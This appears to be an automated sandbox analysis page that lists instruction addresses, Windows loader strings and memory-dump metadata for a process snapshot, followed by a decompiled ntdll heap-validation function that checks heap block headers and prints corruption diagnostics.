0x1f042e16
0x1f042e19
0x1f042e1b
0x1f042e1d
0x1f042e1d
0x00000000
0x1f042d1d
0x1f042d1d
0x1f042d22
0x1f042d24
0x00000000
0x00000000
0x1f042d2a
0x1f042d2c
0x1f042d30
0x1f042d99
0x1f042d99
0x1f042da0
0x1f042da2
0x1f042da2
0x1f042da2
0x1f042da2
0x1f042da9
0x1f042da9
0x1f042dab
0x1f042e20
0x1f042e20
0x1f042e27
0x1f042e2a
0x1f042e2c
0x1f042e2e
0x1f042e33
0x1f042e33
0x1f042e33
0x1f042e36
0x1f042e3d
0x1f042e40
0x1f042e42
0x1f042e44
0x1f042e49
0x1f042e49
0x1f042e49
0x1f042e4c
0x1f042e4c
0x1f042e51
0x1f042e53
0x1f042e57
0x1f042e57
0x1f042e65
0x1f042e66
0x1f042e67
0x1f042e68
0x1f042e72
0x1f042e72
0x1f042daf
0x00000000
0x1f042daf
0x1f042d32
0x1f042d34
0x00000000
0x00000000
0x1f042d36
0x1f042d39
0x00000000
0x00000000
0x1f042d42
0x1f042d4d
0x1f042d55
0x1f042d56
0x1f042d76
0x1f042d78
0x1f042db9
0x1f042db9
0x1f042dbb
0x1f042dbb
0x00000000
0x1f042dbb
0x1f042d7e
0x1f042d7f
0x1f042d87
0x1f042d8d
0x1f042d8f
0x1f042d91
0x00000000
0x00000000
0x1f042d93
0x1f042d97
0x00000000
0x00000000
0x00000000
0x1f042d97
0x1f042d17
0x1f042067
0x1f04206f
0x1f042070
0x1f042073
0x1f042074
0x1f042079
0x1f04207f
0x00000000
0x1f042085
0x1f04208c
0x1f042090
0x1f042096
0x1f042098
0x1f0420a6
0x1f0420b8
0x1f0420c4
0x1f0420cb
0x1f0420d0
0x1f0420d6
0x1f0420df
0x1f0420df
0x1f0420d6
0x1f0420a6
0x1f0420f6
0x1f042110
0x1f04212a
0x1f04212f
0x1f042147
0x1f042149
0x1f04214e
0x1f042154
0x1f042156
0x1f042156
0x1f04215b
0x1f042175
0x1f04217a
0x1f042180
0x1f042185
0x1f042185
0x1f04218b
0x1f0421a3
0x1f0421a5
0x1f0421af
0x1f0421b1
0x1f0421b1
0x1f0421b8
0x1f0421d2
0x1f0421d7
0x1f0421dd
0x1f0421e5
0x1f0421e5
0x1f0421e8
0x1f0421fe
0x1f042200
0x1f042209
0x1f042210
0x1f042210
0x1f042217
0x1f04222f
0x1f0423df
0x1f0423f2
0x1f0425c7
0x1f0425cc
0x1f0425ce
0x1f0425d4
0x1f0425d5
0x1f0425d7
0x1f0425d9
0x1f0425d9
0x1f0425de
0x1f0425de
0x1f0425f6
0x1f0427b9
0x1f0427c1
0x1f042830
0x1f042841
0x1f0429a7
0x1f0429a7
0x1f0429ab
0x1f0429b5
0x1f0429b7
0x1f0429b7
0x1f0429bd
0x1f0429bf
0x1f0429bf
0x1f0429cf
0x1f0429d6
0x1f0429e0
0x1f0429e0
0x1f0429e9
0x1f0429ec
0x1f0429f1
0x00000000
0x00000000
0x1f0429f3
0x1f0429f3
0x1f0429f9
0x1f042a08
0x1f042a0d
0x1f042a0f
0x1f042b8e
0x1f042b8e
0x1f042b92
0x1f042b92
0x1f042b98
0x1f042ba7
0x1f042bba
0x1f042bc4
0x1f042bc9
0x1f042bcb
0x1f042c32
0x1f042c47
0x1f042c4c
0x1f042c4e
0x1f042c54
0x1f042c54
0x1f042c5e
0x1f042c65
0x1f042c69
0x1f042c6d
0x1f042c81
0x1f042c81
0x1f042c81
0x1f042c6f
0x1f042c76
0x1f042c7b
0x1f042c7b
0x00000000
0x1f042c6d
0x1f042bcd
0x1f042bd1
0x1f042bd7
0x1f042c23
0x1f042c23
0x1f042c27
0x1f042c2a
0x00000000
0x1f042c2a
0x1f042bd9
0x1f042be0
0x1f042be5
0x1f042be7
0x1f042be9
0x1f042be9
0x1f042bef
0x1f042bef
0x1f042bf3
0x1f042bf9
0x1f042bfb
0x1f042c06
0x1f042c0b
0x1f042c0d
0x1f042c2e
0x00000000
0x1f042c2e
0x1f042c0f
0x1f042c17
0x1f042c19
0x1f042c19
0x1f042c1f
0x1f042c1f
0x1f042c17
0x00000000
0x1f042bf9
0x1f042a15
0x1f042a1d
0x1f042a1e
0x1f042a23
0x1f042a2c
0x1f042a2d
0x1f042a36
0x1f042a37
0x1f042a38
0x1f042a3d
0x1f042a3f
0x1f042a7c
0x1f042a81
0x00000000
0x00000000
0x00000000
0x00000000
0x1f042a87
0x1f042a87
0x1f042a87
0x1f042a91
0x1f042a94
0x1f042a96
0x00000000
0x00000000
0x1f042a9c
0x1f042ab1
0x1f042ab3
0x1f042ab5
0x00000000
0x00000000
0x1f042abf
0x1f042ac1
0x1f042ac2
0x1f042ac3
0x1f042ace
0x1f042acf
0x1f042ad1
0x1f042ad2
0x1f042ad3
0x1f042ad8
0x1f042ada
0x1f042a43
0x1f042a43
0x1f042a46
0x1f042a49
0x1f042b3f
0x1f042b41
0x1f042b42
0x1f042b44
0x1f042b49
0x1f042b4d
0x1f042b50
0x1f042b55
0x1f042b5e
0x1f042b63
0x1f042b63
0x1f042b50
0x1f042b66
0x1f042b66
0x1f042b68
0x1f042b76
0x1f042b7b
0x1f042b7b
0x1f042b7f
0x1f042b83
0x1f042b85
0x1f042b87
0x1f042b87
0x00000000
0x1f042b85
0x1f042a4f
0x1f042a52
0x00000000
0x00000000
0x1f042a5a
0x1f042a5b
0x1f042a5d
0x1f042afa
0x1f042afd
0x1f042aff
0x1f042b02
0x1f042b08
0x1f042b0a
0x1f042b0c
0x1f042b0f
0x1f042b13
0x1f042b1b
0x1f042b24
0x1f042b2d
0x1f042b2e
0x1f042b37
0x1f042b38
0x1f042b38
0x1f042b0a
0x1f042b02
0x1f042a63
0x1f042a63
0x1f042a66
0x1f042a6c
0x1f042a73
0x1f042a73
0x1f042a66
0x00000000
0x1f042a5d
0x1f042ae0
0x1f042ae5
0x00000000
0x00000000
0x1f042af3
0x1f042af3
0x00000000
0x1f042a87
0x1f042a41
0x1f042a41
0x00000000
0x1f042a41
0x1f04284b
0x1f04284c
0x1f042851
0x1f04285a
0x1f04285b
0x1f042864
0x1f042865
0x1f042866
0x1f04286d
0x1f0428aa
0x1f0428af
0x00000000
0x00000000
0x00000000
0x00000000
0x1f0428b5
0x1f0428b5
0x1f0428b5
0x1f0428bf
0x1f0428c2
0x1f0428c4
0x00000000
0x00000000
0x1f0428ca
0x1f0428df
0x1f0428e1
0x1f0428e3
0x00000000
0x00000000
0x1f0428ed
0x1f0428ef
0x1f0428f0
0x1f0428f1
0x1f0428f9
0x1f0428fa
0x1f0428fc
0x1f0428fd
0x1f0428fe
0x1f042903
0x1f042905
0x1f042871
0x1f042871
0x1f042877
0x1f042969
0x1f04296a
0x1f04296c
0x1f042971
0x1f042975
0x1f042978
0x1f04297d
0x1f042986
0x1f04298b
0x1f04298b
0x1f042978
0x1f042886
0x1f042888
0x1f04288b
0x1f042925
0x1f042928
0x1f04292a
0x1f04292d
0x1f042933
0x1f042935
0x1f042937
0x1f04293a
0x1f04293e
0x1f042946
0x1f04294f
0x1f042958
0x1f042959
0x1f04295f
0x1f042960
0x1f042960
0x1f042935
0x1f04292d
0x1f042891
0x1f042894
0x1f04289a
0x1f0428a1
0x1f0428a1
0x1f042894
0x1f04288b
0x1f04298e
0x1f042990
0x00000000
0x00000000
0x1f04299e
0x00000000
0x1f04299e
0x1f04290b
0x1f042910
0x00000000
0x00000000
0x1f04291e
0x1f04291e
0x1f0429a3
0x00000000
0x1f0429a3
0x1f04286f
0x00000000
0x1f04286f
0x1f0427c3
0x1f0427d2
0x1f0427da
0x1f0427db
0x1f0427dd
0x1f0427e2
0x1f0427ed
0x1f0427f4
0x1f0427ff
0x1f04280f
0x1f042817
0x1f042828
0x1f04282a
0x00000000
0x00000000
0x00000000
0x1f04282a
0x1f042819
0x00000000
0x1f042819
0x1f042600
0x1f042601
0x1f042606
0x1f04260f
0x1f042610
0x1f042616
0x1f042617
0x1f04261d
0x1f042621
0x1f04266b
0x1f042671
0x00000000
0x00000000
0x00000000
0x00000000
0x1f042677
0x1f042677
0x1f042677
0x1f042681
0x1f042684
0x1f042686
0x00000000
0x00000000
0x1f04268c
0x1f04269c
0x1f0426a1
0x1f0426a5
0x1f0426a7
0x00000000
0x00000000
0x1f0426ad
0x1f0426b1
0x1f0426b5
0x1f0426b6
0x1f0426b7
0x1f0426b8
0x1f0426be
0x1f0426c0
0x1f0426c1
0x1f0426c7
0x1f0426c9
0x1f0426cb
0x00000000
0x00000000
0x1f0426d1
0x1f0426d7
0x00000000
0x1f0426dd
0x1f0426eb
0x00000000
0x1f0426eb
0x1f0426d7
0x1f042822
0x00000000
0x1f042623
0x1f042625
0x1f042629
0x1f042629
0x1f04262f
0x1f042750
0x1f042751
0x1f042753
0x00000000
0x00000000
0x1f042758
0x1f04275c
0x1f04275f
0x1f042777
0x1f042761
0x1f042764
0x1f04276d
0x1f042772
0x1f042772
0x00000000
0x1f04263e
0x1f042640
0x1f042643
0x1f0426fc
0x1f0426ff
0x1f042706
0x1f042706
0x00000000
0x1f042706
0x1f042701
0x1f042704
0x1f042711
0x1f042713
0x1f04271c
0x1f04271f
0x1f042723
0x1f04272b
0x1f042734
0x1f04273d
0x1f04273e
0x1f042744
0x1f04274a
0x1f042715
0x1f042715
0x1f042715
0x00000000
0x1f042713
0x00000000
0x1f042649
0x1f04264c
0x1f0426f2
0x1f042652
0x1f042652
0x1f042659
0x1f042659
0x1f04277c
0x1f04277c
0x1f042782
0x1f042790
0x1f042795
0x1f042795
0x1f042799
0x1f04279b
0x1f0427a6
0x1f0427ad
0x1f0427b4
0x1f0427b4
0x00000000
0x1f04279b
0x1f042643
0x1f04262f
0x1f042621
0x1f0423fc
0x1f0423fd
0x1f042402
0x1f04240b
0x1f04240c
0x1f042412
0x1f042413
0x1f042419
0x1f04241d
0x1f042468
0x1f04246e
0x00000000
0x00000000
0x00000000
0x00000000
0x1f042474
0x1f042474
0x1f042474
0x1f04247e
0x1f042481
0x1f042483
0x00000000
0x00000000
0x1f042489
0x1f042499
0x1f04249e
0x1f0424a2
0x1f0424a4
0x00000000
0x00000000
0x1f0424aa
0x1f0424ae
0x1f0424b2
0x1f0424b3
0x1f0424b4
0x1f0424b5
0x1f0424bb
0x1f0424bd
0x1f0424be
0x1f0424c4
0x1f0424c6
0x1f0424c8
0x00000000
0x00000000
0x1f0424ce
0x1f0424d4
0x00000000
0x1f0424da
0x1f0424e8
0x00000000
0x1f0424e8
0x1f0424d4
0x1f042662
0x00000000
0x1f04241f
0x1f042421
0x1f042425
0x1f042425
0x1f04242b
0x1f042548
0x1f042549
0x1f04254b
0x00000000
0x1f04254d
0x1f042550
0x1f042554
0x1f042557
0x1f04256f
0x1f042559
0x1f04255c
0x1f042565
0x1f04256a
0x1f04256a
0x00000000
0x1f042557
0x1f04243a
0x1f04243c
0x1f04243f
0x1f0424f6
0x1f0424f9
0x1f042500
0x1f042500
0x00000000
0x1f042500
0x1f0424fb
0x1f0424fe
0x1f042507
0x1f04250c
0x1f04250f
0x1f042518
0x1f04251b
0x1f04251f
0x1f042527
0x1f042530
0x1f042531
0x1f04253a
0x1f04253c
0x1f042542
0x1f042511
0x1f042511
0x1f042511
0x00000000
0x1f04250f
0x00000000
0x1f042445
0x1f042448
0x1f0424ef
0x1f04244e
0x1f04244e
0x1f042455
0x1f042455
0x1f042574
0x1f042574
0x1f04257a
0x1f042588
0x1f04258d
0x1f04258d
0x1f042591
0x1f042593
0x00000000
0x1f042595
0x1f042595
0x1f04259c
0x1f0425a8
0x1f0425a8
0x1f0425b7
0x00000000
0x1f0425b9
0x1f0425c0
0x1f0425c2
0x1f0425c2
0x00000000
0x1f0425c0
0x1f0425b7
0x1f042593
0x1f04243f
0x1f04242b
0x1f04241d
0x1f042239
0x1f04223a
0x1f04223f
0x1f042248
0x1f042249
0x1f04224f
0x1f042250
0x1f042256
0x1f04225a
0x1f04229b
0x1f0422a1
0x00000000
0x00000000
0x00000000
0x00000000
0x1f0422a7
0x1f0422a7
0x1f0422a7
0x1f0422b1
0x1f0422b4
0x1f0422b6
0x00000000
0x00000000
0x1f0422bc
0x1f0422cc
0x1f0422d1
0x1f0422d5
0x1f0422d7
0x00000000
0x00000000
0x1f0422dd
0x1f0422e1
0x1f0422e5
0x1f0422e6
0x1f0422e7
0x1f0422e8
0x1f0422ee
0x1f0422f0
0x1f0422f1
0x1f0422f7
0x1f0422f9
0x1f0422fb
0x00000000
0x00000000
0x1f042301
0x1f042307
0x00000000
0x1f04230d
0x1f04231b
0x00000000
0x1f04231b
0x1f042307
0x1f04245f
0x00000000
0x1f04225c
0x1f04225e
0x1f042262
0x1f042262
0x1f042268
0x1f042380
0x1f042381
0x1f042383
0x00000000
0x1f042385
0x1f042388
0x1f04238c
0x1f04238f
0x1f0423a7
0x1f042391
0x1f042394
0x1f04239d
0x1f0423a2
0x1f0423a2
0x00000000
0x1f04238f
0x1f042277
0x1f042279
0x1f04227c
0x1f04232c
0x1f04232f
0x1f042336
0x1f042336
0x00000000
0x1f042336
0x1f042331
0x1f042334
0x1f042341
0x1f042343
0x1f04234c
0x1f04234f
0x1f042353
0x1f04235b
0x1f042364
0x1f04236d
0x1f04236e
0x1f042374
0x1f04237a
0x1f042345
0x1f042345
0x1f042345
0x00000000
0x1f042343
0x00000000
0x1f042282
0x1f042285
0x1f042322
0x1f04228b
0x1f04228b
0x1f042292
0x1f042292
0x1f0423ac
0x1f0423ac
0x1f0423b2
0x1f0423c0
0x1f0423c5
0x1f0423c5
0x1f0423c9
0x1f0423cb
0x1f0423d3
0x1f0423db
0x1f0423db
0x00000000
0x1f0423cb
0x1f04227c
0x1f042268
0x1f04225a

Strings

MaxLoaderThreads, xrefs: 1F04216C
RaiseExceptionOnPossibleDeadlock, xrefs: 1F0421F9
CFGOptions, xrefs: 1F0425E7
GlobalFlag, xrefs: 1F042BBF, 1F042CD9
minkernel\ntdll\ldrinit.c, xrefs: 1F042E07
TracingFlags, xrefs: 1F0421C9
ShutdownFlags, xrefs: 1F042121
DisableExceptionChainValidation, xrefs: 1F0423DF
@, xrefs: 1F0425C2
@, xrefs: 1F0427F4
ExecuteOptions, xrefs: 1F042220
GlobalFlag2, xrefs: 1F042C40
MinimumStackCommitInBytes, xrefs: 1F042830
MaxDeadActivationContexts, xrefs: 1F042A02
Initializing the application verifier package failed with status 0x%08lx, xrefs: 1F042DF6
UseImpersonatedDeviceMap, xrefs: 1F04219C
FrontEndHeapDebugOptions, xrefs: 1F042109
UnloadEventTraceDepth, xrefs: 1F042140
DisableHeapLookaside, xrefs: 1F0420ED
LdrpInitializeExecutionOptions, xrefs: 1F042DFD

Memory Dump Source

Source File: 0000001B.00000002.1993935132.000000001EF90000.00000040.00000800.00020000.00000000.sdmp, Offset: 1EF90000, based on PE: true

Associated: 0000001B.00000002.1995499136.000000001F0B9000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 0000001B.00000002.1995678669.000000001F0BD000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_1ef90000_ieinstal.jbxd

Similarity

API ID:
String ID: @$@$CFGOptions$DisableExceptionChainValidation$DisableHeapLookaside$ExecuteOptions$FrontEndHeapDebugOptions$GlobalFlag$GlobalFlag2$Initializing the application verifier package failed with status 0x%08lx$LdrpInitializeExecutionOptions$MaxDeadActivationContexts$MaxLoaderThreads$MinimumStackCommitInBytes$RaiseExceptionOnPossibleDeadlock$ShutdownFlags$TracingFlags$UnloadEventTraceDepth$UseImpersonatedDeviceMap$minkernel\ntdll\ldrinit.c
API String ID: 0-2160512332
Opcode ID: 629ead9be03e0df3d27feebf9f6358a1fdb94384aa07d1cfb4e9540e20c38ff1
Instruction ID: f0855800addc98e94c2f90e4e6f78985f7e815b0e59da366d69fab9c71171813
Opcode Fuzzy Hash: 629ead9be03e0df3d27feebf9f6358a1fdb94384aa07d1cfb4e9540e20c38ff1
Instruction Fuzzy Hash: A5926D75604382AFD721CF20C890B9BB7E8BF84754F214A2DFA95DB250E774E844CB96

Uniqueness

Uniqueness Score: -1.00%

Function 1F070E6D Relevance: 11.8, Strings: 9, Instructions: 515
COMMONCrypto

Download Yara Rule

C-Code - Quality: 48%

			E1F070E6D(intOrPtr* __ecx, signed int __edx, intOrPtr* _a8, signed int* _a12, signed int* _a16, intOrPtr _a20, intOrPtr _a24) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t194;
				intOrPtr _t196;
				intOrPtr _t215;
				signed int _t230;
				signed char _t236;
				intOrPtr _t237;
				unsigned int _t250;
				signed int _t251;
				intOrPtr _t257;
				intOrPtr _t267;
				signed int _t291;
				signed int _t293;
				intOrPtr _t294;
				signed int _t298;
				intOrPtr _t304;
				signed int* _t308;
				intOrPtr* _t309;
				intOrPtr* _t310;
				signed int _t317;
				signed int _t319;
				signed short _t322;
				signed short _t325;
				signed int _t327;
				signed int _t330;
				signed int _t332;
				signed int _t336;
				signed int _t337;
				void* _t338;
				signed int _t344;
				intOrPtr* _t345;
				signed int _t352;
				signed int _t354;
				signed char _t356;
				signed int* _t357;
				signed int _t372;
				signed int _t374;
				signed int _t376;
				signed int _t379;
				signed char _t384;
				intOrPtr* _t387;
				signed int _t389;
				signed int _t392;
				intOrPtr* _t393;
				signed int _t394;
				intOrPtr _t399;
				intOrPtr* _t401;
				signed int _t402;
				signed int _t403;
				signed int _t416;

				_t345 = __ecx;
				_v16 = _v16 & 0x00000000;
				_t194 = 0;
				_v8 = _v8 & 0;
				_t344 = __edx;
				_v12 = 0;
				_t401 = __ecx;
				_t402 = __edx;
				if(__edx >=  *((intOrPtr*)(__edx + 0x28))) {
					L88:
					_t403 = _v16;
					if( *((intOrPtr*)(_t344 + 0x2c)) == _t403) {
						__eflags =  *((intOrPtr*)(_t344 + 0x30)) - _t194;
						if( *((intOrPtr*)(_t344 + 0x30)) == _t194) {
							L107:
							return 1;
						}
						_t196 =  *[fs:0x30];
						__eflags =  *(_t196 + 0xc);
						if( *(_t196 + 0xc) == 0) {
							_push("HEAP: ");
							E1EFBB910();
						} else {
							E1EFBB910("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
						}
						_push(_v12);
						_push( *((intOrPtr*)(_t344 + 0x30)));
						_push(_t344);
						_push("Heap Segment at %p contains invalid NumberOfUnCommittedRanges (%x != %x)\n");
						L122:
						E1EFBB910();
						L119:
						return 0;
					}
					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
						_push("HEAP: ");
						E1EFBB910();
					} else {
						E1EFBB910("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
					}
					_push(_t403);
					_push( *((intOrPtr*)(_t344 + 0x2c)));
					_push(_t344);
					_push("Heap Segment at %p contains invalid NumberOfUnCommittedPages (%x != %x)\n");
					goto L122;
				} else {
					goto L1;
				}
				do {
					L1:
					 *_a16 = _t402;
					if( *(_t401 + 0x4c) != 0) {
						 *_t402 =  *_t402 ^  *(_t401 + 0x50);
						_t411 =  *(_t402 + 3) - ( *(_t402 + 2) ^  *(_t402 + 1) ^  *_t402);
						if( *(_t402 + 3) != ( *(_t402 + 2) ^  *(_t402 + 1) ^  *_t402)) {
							_push(_t345);
							E1F07D646(_t344, _t401, _t402, _t401, _t402, _t411);
						}
					}
					if(_v8 != ( *(_t402 + 4) ^  *(_t401 + 0x54))) {
						_t215 =  *[fs:0x30];
						__eflags =  *(_t215 + 0xc);
						if( *(_t215 + 0xc) == 0) {
							_push("HEAP: ");
							E1EFBB910();
						} else {
							E1EFBB910("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
						}
						_push(_v8 & 0x0000ffff);
						_t352 =  *(_t402 + 4) & 0x0000ffff ^  *(_t401 + 0x54) & 0x0000ffff;
						__eflags = _t352;
						_push(_t352);
						E1EFBB910("Heap entry %p has incorrect PreviousSize field (%04x instead of %04x)\n", _t402);
						L117:
						__eflags =  *(_t401 + 0x4c);
						if( *(_t401 + 0x4c) != 0) {
							 *(_t402 + 3) =  *(_t402 + 2) ^  *(_t402 + 1) ^  *_t402;
							 *_t402 =  *_t402 ^  *(_t401 + 0x50);
							__eflags =  *_t402;
						}
						goto L119;
					}
					_t230 =  *_t402 & 0x0000ffff;
					_t384 =  *(_t402 + 2);
					_t354 = _t230;
					_v8 = _t354;
					_v20 = _t354;
					_v28 = _t230 << 3;
					if((_t384 & 0x00000001) == 0) {
						__eflags =  *(_t401 + 0x40) & 0x00000040;
						_t356 = (_t354 & 0xffffff00 | ( *(_t401 + 0x40) & 0x00000040) != 0x00000000) & _t384 >> 0x00000002;
						__eflags = _t356 & 0x00000001;
						if((_t356 & 0x00000001) == 0) {
							L66:
							_t357 = _a12;
							 *_a8 =  *_a8 + 1;
							 *_t357 =  *_t357 + ( *_t402 & 0x0000ffff);
							__eflags =  *_t357;
							L67:
							_t236 =  *(_t402 + 6);
							if(_t236 == 0) {
								_t345 = _t401;
							} else {
								_t345 = (_t402 & 0xffff0000) - ((_t236 & 0x000000ff) << 0x10) + 0x10000;
							}
							if(_t345 != _t344) {
								_t237 =  *[fs:0x30];
								__eflags =  *(_t237 + 0xc);
								if( *(_t237 + 0xc) == 0) {
									_push("HEAP: ");
									E1EFBB910();
								} else {
									E1EFBB910("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
								}
								_push( *(_t402 + 6) & 0x000000ff);
								_push(_t402);
								_push("Heap block at %p has incorrect segment offset (%x)\n");
								goto L95;
							} else {
								if( *((char*)(_t402 + 7)) != 3) {
									__eflags =  *(_t401 + 0x4c);
									if( *(_t401 + 0x4c) != 0) {
										 *(_t402 + 3) =  *(_t402 + 1) ^  *_t402 ^  *(_t402 + 2);
										 *_t402 =  *_t402 ^  *(_t401 + 0x50);
										__eflags =  *_t402;
									}
									_t402 = _t402 + _v28;
									__eflags = _t402;
									goto L86;
								}
								_t250 =  *(_t402 + 0x1c);
								if(_t250 == 0) {
									_t251 =  *_t402 & 0x0000ffff;
									__eflags = _t402 + _t251 * 8 -  *((intOrPtr*)(_t344 + 0x28));
									if(_t402 + _t251 * 8 ==  *((intOrPtr*)(_t344 + 0x28))) {
										__eflags =  *(_t401 + 0x4c);
										if( *(_t401 + 0x4c) != 0) {
											 *(_t402 + 3) =  *(_t402 + 2) ^  *(_t402 + 1) ^  *_t402;
											 *_t402 =  *_t402 ^  *(_t401 + 0x50);
											__eflags =  *_t402;
										}
										goto L107;
									}
									_t257 =  *[fs:0x30];
									__eflags =  *(_t257 + 0xc);
									if( *(_t257 + 0xc) == 0) {
										_push("HEAP: ");
										E1EFBB910();
									} else {
										E1EFBB910("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
									}
									_push( *((intOrPtr*)(_t344 + 0x28)));
									_push(_t402);
									_push("Heap block at %p is not last block in segment (%p)\n");
									L95:
									E1EFBB910();
									goto L117;
								}
								_v12 = _v12 + 1;
								_v16 = _v16 + (_t250 >> 0xc);
								if( *(_t401 + 0x4c) != 0) {
									 *(_t402 + 3) =  *(_t402 + 1) ^  *_t402 ^  *(_t402 + 2);
									 *_t402 =  *_t402 ^  *(_t401 + 0x50);
								}
								_t402 = _t402 + 0x20 +  *(_t402 + 0x1c);
								if(_t402 ==  *((intOrPtr*)(_t344 + 0x28))) {
									L82:
									_v8 = _v8 & 0x00000000;
									goto L86;
								} else {
									if( *(_t401 + 0x4c) != 0) {
										 *_t402 =  *_t402 ^  *(_t401 + 0x50);
										_t429 =  *(_t402 + 3) - ( *(_t402 + 2) ^  *(_t402 + 1) ^  *_t402);
										if( *(_t402 + 3) != ( *(_t402 + 2) ^  *(_t402 + 1) ^  *_t402)) {
											_push(_t345);
											_t345 = _t401;
											E1F07D646(_t344, _t345, _t402, _t401, _t402, _t429);
										}
									}
									if( *(_t401 + 0x54) !=  *(_t402 + 4)) {
										_t267 =  *[fs:0x30];
										__eflags =  *(_t267 + 0xc);
										if( *(_t267 + 0xc) == 0) {
											_push("HEAP: ");
											E1EFBB910();
										} else {
											E1EFBB910("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
										}
										_push( *(_t402 + 4) & 0x0000ffff ^  *(_t401 + 0x54) & 0x0000ffff);
										_push(_t402);
										_push("Heap block at %p has corrupted PreviousSize (%lx)\n");
										goto L95;
									} else {
										if( *(_t401 + 0x4c) != 0) {
											 *(_t402 + 3) =  *(_t402 + 2) ^  *(_t402 + 1) ^  *_t402;
											 *_t402 =  *_t402 ^  *(_t401 + 0x50);
										}
										goto L82;
									}
								}
							}
						}
						_t291 = _v28 + 0xfffffff0;
						_v24 = _t291;
						__eflags = _t384 & 0x00000002;
						if((_t384 & 0x00000002) != 0) {
							__eflags = _t291 - 4;
							if(_t291 > 4) {
								_t291 = _t291 - 4;
								__eflags = _t291;
								_v24 = _t291;
							}
						}
						__eflags = _t384 & 0x00000008;
						if((_t384 & 0x00000008) == 0) {
							_t105 = _t402 + 0x10; // -8
							_t293 = E1F0180A0(_t105, _t291, 0xfeeefeee);
							_v20 = _t293;
							__eflags = _t293 - _v24;
							if(_t293 != _v24) {
								_t294 =  *[fs:0x30];
								__eflags =  *(_t294 + 0xc);
								if( *(_t294 + 0xc) == 0) {
									_push("HEAP: ");
									E1EFBB910();
								} else {
									E1EFBB910("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
								}
								_t298 = _v20 + 8 + _t402;
								__eflags = _t298;
								_push(_t298);
								_push(_t402);
								_push("Free Heap block %p modified at %p after it was freed\n");
								goto L95;
							}
							goto L66;
						} else {
							_t372 =  *((intOrPtr*)(_t402 + 8));
							_t387 =  *((intOrPtr*)(_t402 + 0xc));
							_v24 = _t372;
							_v28 = _t387;
							_t304 =  *((intOrPtr*)(_t372 + 4));
							__eflags =  *_t387 - _t304;
							if( *_t387 != _t304) {
								L64:
								_push(0);
								_push( *_t387);
								_push(_t304);
								_t104 = _t402 + 8; // -16
								_t345 = 0xd;
								E1F085FED(_t345, _t401);
								goto L86;
							}
							_t59 = _t402 + 8; // -16
							__eflags =  *_t387 - _t59;
							_t374 = _v24;
							if( *_t387 != _t59) {
								goto L64;
							}
							 *((intOrPtr*)(_t401 + 0x74)) =  *((intOrPtr*)(_t401 + 0x74)) - _v20;
							_t389 =  *(_t401 + 0xb4);
							__eflags = _t389;
							if(_t389 == 0) {
								L35:
								_t308 = _v28;
								 *_t308 = _t374;
								 *(_t374 + 4) = _t308;
								__eflags =  *(_t402 + 2) & 0x00000008;
								if(( *(_t402 + 2) & 0x00000008) == 0) {
									L39:
									_t375 =  *_t402 & 0x0000ffff;
									_t309 = _t401 + 0xc0;
									_v28 =  *_t402 & 0x0000ffff;
									 *(_t402 + 2) = 0;
									 *((char*)(_t402 + 7)) = 0;
									__eflags =  *(_t401 + 0xb4);
									if( *(_t401 + 0xb4) == 0) {
										_t345 =  *_t309;
									} else {
										_t345 = E1EFC1C0E(_t401, _t375);
										_t309 = _t401 + 0xc0;
									}
									__eflags = _t309 - _t345;
									if(_t309 == _t345) {
										L51:
										_t310 =  *((intOrPtr*)(_t345 + 4));
										__eflags =  *_t310 - _t345;
										if( *_t310 != _t345) {
											_push(0);
											_push( *_t310);
											__eflags = 0;
											_push(0);
											_push(_t345);
											_t345 = 0xd;
											E1F085FED(_t345, 0);
										} else {
											_t90 = _t402 + 8; // -16
											_t393 = _t90;
											 *_t393 = _t345;
											 *((intOrPtr*)(_t393 + 4)) = _t310;
											 *_t310 = _t393;
											 *((intOrPtr*)(_t345 + 4)) = _t393;
										}
										 *((intOrPtr*)(_t401 + 0x74)) =  *((intOrPtr*)(_t401 + 0x74)) + ( *_t402 & 0x0000ffff);
										_t392 =  *(_t401 + 0xb4);
										__eflags = _t392;
										if(_t392 == 0) {
											L61:
											__eflags =  *(_t401 + 0x4c);
											if(__eflags != 0) {
												 *(_t402 + 3) =  *(_t402 + 1) ^  *_t402 ^  *(_t402 + 2);
												 *_t402 =  *_t402 ^  *(_t401 + 0x50);
											}
											goto L86;
										} else {
											_t376 =  *_t402 & 0x0000ffff;
											while(1) {
												__eflags = _t376 -  *((intOrPtr*)(_t392 + 4));
												if(_t376 <  *((intOrPtr*)(_t392 + 4))) {
													break;
												}
												_t317 =  *_t392;
												__eflags = _t317;
												if(_t317 == 0) {
													_t319 =  *((intOrPtr*)(_t392 + 4)) - 1;
													L60:
													_t97 = _t402 + 8; // -16
													_t345 = _t401;
													E1EFC1B5D(_t345, _t392, 1, _t97, _t319, _t376);
													goto L61;
												}
												_t392 = _t317;
											}
											_t319 = _t376;
											goto L60;
										}
									} else {
										_t394 =  *(_t401 + 0x4c);
										while(1) {
											__eflags = _t394;
											if(_t394 == 0) {
												_t322 =  *(_t345 - 8) & 0x0000ffff;
											} else {
												_t325 =  *(_t345 - 8);
												_t394 =  *(_t401 + 0x4c);
												__eflags = _t394 & _t325;
												if((_t394 & _t325) != 0) {
													_t325 = _t325 ^  *(_t401 + 0x50);
													__eflags = _t325;
												}
												_t322 = _t325 & 0x0000ffff;
											}
											__eflags = _v28 - (_t322 & 0x0000ffff);
											if(_v28 <= (_t322 & 0x0000ffff)) {
												goto L51;
